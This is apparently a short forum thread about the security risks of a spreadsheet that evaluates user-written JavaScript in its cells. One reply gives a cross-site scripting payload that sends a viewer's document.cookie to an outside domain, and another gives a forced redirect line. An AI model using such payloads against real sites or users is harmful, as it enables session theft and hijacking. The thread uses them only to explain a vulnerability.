[genericacct]

Please elaborate. ( i ask because i am writing a spreadsheet where every cell can be JSON or a JS expression )

What sort of vulnerabilities does this expose, besides letting the user shoot their feet repeatedly? Cross site scripting?

[araskoktas]

document.write('<img src="somedomain.com/?'+document.cookie);

[cosarara97]

But you'd need to send a spreadsheet with that to the victim.

[araskoktas]

Well yes, the idea is the sheet being open to a group of people for collaboration or whatever reason.

[genericacct]

have you heard of the HttpOnly attribute for cookies?

[araskoktas]

good, send HttpOnly cookies and solve that problem. window.location.href='http://www.redt*be.com'; -- if you think evaluating JS code, as-is passed by the client is a good idea go ahead.

[genericacct]

I most definitely will. and if my users want to browse your favorite porn site i don't see why i shouldn't let them..